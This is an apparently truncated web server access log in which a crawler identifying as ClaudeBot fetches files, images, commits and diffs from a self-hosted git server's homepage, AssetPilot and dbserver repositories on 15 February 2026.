git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 24371] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10834] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fmail_contact.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11539] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10831] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 10952] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 24366] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 11052] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10850] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 11875] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18095] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/.gitignore" [Client 216.73.216.188] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15343] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 11909] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 216.73.216.188] [Length 15717] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11486] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/.gitignore" [Client 216.73.216.188] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 216.73.216.188] [Length 11447] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument%2Fassetpilot.ico" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 216.73.216.188] [Length 11433] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10920] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11589] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 457911] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 10043] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FOpcUaMinimal.csproj" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10921] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 8482] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15775] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 11906] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source" [Client 216.73.216.188] [Length 15654] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10918] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 204076] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=rendered" [Client 